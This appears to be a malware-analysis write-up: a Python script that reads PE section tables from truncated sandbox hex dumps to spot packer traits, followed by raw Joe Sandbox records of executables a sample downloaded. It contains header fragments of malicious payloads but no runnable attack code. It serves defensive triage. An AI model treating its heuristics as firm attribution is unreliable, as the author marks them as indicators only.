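The "Data Raw" excerpts in these records are the opening bytes of each payload the sample fetched, and although the sandbox truncates them, they reach past the DOS and PE/COFF headers into the section table. That is enough to read the payload's layout without detonating it. The following parser is an added example, not part of the Joe Sandbox report or of any tool it names. SAMPLE_HEX is the first 0x290 bytes of the 1,775,616-byte response recorded above (ETag "67ab844b-1b1800"), transcribed from that record's dump; the dictionary keys, the `Section` type and the triage heuristics are my own, and the same functions accept the hex of any other record on this page.

```python
"""Recover PE layout from a sandbox 'Data Raw' hex excerpt (added example, not
from the report).  SAMPLE_HEX is transcribed from the first record above; the
heuristics in triage() are mine and are indicators, not verdicts."""
import re
import struct
from dataclasses import dataclass

# First 0x290 bytes of the 1,775,616-byte download (ETag "67ab844b-1b1800").
SAMPLE_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00
00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20
00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0
2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00
00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e
00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0
63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0
"""

IMAGE_SCN_RWX = 0x20000000 | 0x40000000 | 0x80000000  # MEM_EXECUTE | MEM_READ | MEM_WRITE


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_offset: int
    characteristics: int
    def contains_rva(self, rva: int) -> bool:
        return self.virtual_address <= rva < self.virtual_address + self.virtual_size
    def is_rwx(self) -> bool:
        return self.characteristics & IMAGE_SCN_RWX == IMAGE_SCN_RWX


def parse_pe(data: bytes) -> dict:
    """Parse DOS/COFF/optional headers plus whatever part of the section table the
    excerpt holds; a cut-off table sets 'truncated' instead of raising."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                  # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                                 # optional header start
    magic = struct.unpack_from("<H", data, opt)[0]                # 0x10b PE32, 0x20b PE32+
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    base_fmt, base_off = ("<Q", 24) if magic == 0x20B else ("<I", 28)
    image_base = struct.unpack_from(base_fmt, data, opt + base_off)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]           # AddressOfEntryPoint (RVA)
    align = struct.unpack_from("<I", data, opt + 32)[0]           # SectionAlignment
    sections, truncated = [], False
    for i in range(nsec):
        off = opt + opt_size + 40 * i                             # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            truncated = True
            break
        raw_name, vs, va, rs, ro, _, _, _, _, ch = struct.unpack_from("<8s4I2I2HI", data, off)
        sections.append(Section(raw_name.split(b"\0")[0].decode("latin-1"), vs, va, rs, ro, ch))
    return {"machine": machine, "timestamp": stamp, "entry_point": entry, "image_base": image_base,
            "section_alignment": align, "declared_sections": nsec,
            "sections": sections, "truncated": truncated}


def triage(pe: dict) -> dict:
    """Traits a packer leaves in the section table (my heuristics, not the report's)."""
    secs, align = pe["sections"], pe["section_alignment"]
    return {
        "odd_name": [s.name for s in secs if not re.fullmatch(r"\.?[A-Za-z0-9_$]{1,8}", s.name)],
        "rwx": [s.name for s in secs if s.is_rwx()],
        # more than one alignment page of memory beyond what is on disk: filled after load
        "inflates_in_memory": [s.name for s in secs if s.virtual_size > s.raw_size + align],
        "entry_section": next((s.name for s in secs if s.contains_rva(pe["entry_point"])), None),
    }


if __name__ == "__main__":
    hdr = parse_pe(bytes.fromhex(SAMPLE_HEX))
    for s in hdr["sections"]:
        print(f"{s.name!r:12} va={s.virtual_address:#08x} vsize={s.virtual_size:#08x} "
              f"raw={s.raw_size:#08x} chars={s.characteristics:#010x}")
    print(triage(hdr))
```

Run against the first record, the parser reports seven sections: three with whitespace names, two with random eight-letter names, `.rsrc`/`.idata` and a `.taggant` section, five of them mapped read/write/execute, an eight-space section that reserves 0x2ac000 bytes of memory with only 0x200 bytes on disk, and the entry point (RVA 0x462000) sitting in `.taggant`. `.taggant` is the section the IEEE Software Taggant System adds, which commercial protectors such as Themida/WinLicense emit; the report itself does not name the packer, so treat that as context rather than attribution. Feeding the 414,016-byte record's dump to the same code gives a conventional `.text`/`.rsrc`/`.reloc`/`.rdata` layout, a useful contrast when deciding which of the dropped files to unpack first.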
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:38 GMTContent-Type: application/octet-streamContent-Length: 414016Last-Modified: Tue, 11 Feb 2025 08:59:13 GMTConnection: keep-aliveETag: "67ab1161-65140"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 0c 06 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 60 01 00 00 10 05 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:43 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 01 00 00 14 05 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 06 00 00 14 05 00 00 4c 06 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:48 GMTContent-Type: application/octet-streamContent-Length: 332800Last-Modified: Fri, 07 Feb 2025 04:36:30 GMTConnection: keep-aliveETag: "67a58dce-51400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 aa 00 00 00 00 00 00 40 b9 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d9 9b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 9d 04 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 64 04 00 00 10 00 00 00 66 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 73 20 00 00 00 80 04 00 00 22 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 cf 00 00 00 b0 04 00 00 4e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 39 00 00 00 80 05 00 00 3a 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:47 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:50 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 
90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:52 GMTContent-Type: application/octet-streamContent-Length: 2150912Last-Modified: Tue, 11 Feb 2025 16:41:29 GMTConnection: keep-aliveETag: "67ab7db9-20d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 97 bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 4b 00 00 04 00 00 8c 28 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 